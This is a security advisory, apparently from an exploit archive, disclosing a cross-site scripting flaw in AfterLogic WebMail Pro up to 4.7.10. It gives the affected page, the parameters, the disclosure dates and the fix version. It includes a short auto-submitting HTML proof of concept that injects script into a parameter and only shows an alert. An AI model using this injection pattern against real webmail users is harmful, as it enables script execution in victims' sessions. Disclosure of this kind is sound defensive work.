AfterLogic WebMail Pro 4.7.10 xss

ID 1337DAY-ID-9881
Type zdt
Reporter Sebastien Duquette
Modified 2009-10-05T00:00:00


Exploit for unknown platform in category web applications

AfterLogic WebMail Pro 4.7.10 xss

Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.
Quote from :
"Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API."
Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
S?bastien Duquette 
Gardien Virtuel (
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009
Proof of concept
The targeted user must be logged in the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location;
alert('xss'); //"/>
The vendor has made available a patched version. Update to AfterLogic
Webmail Pro 4.7.11

# [2018-02-06]  #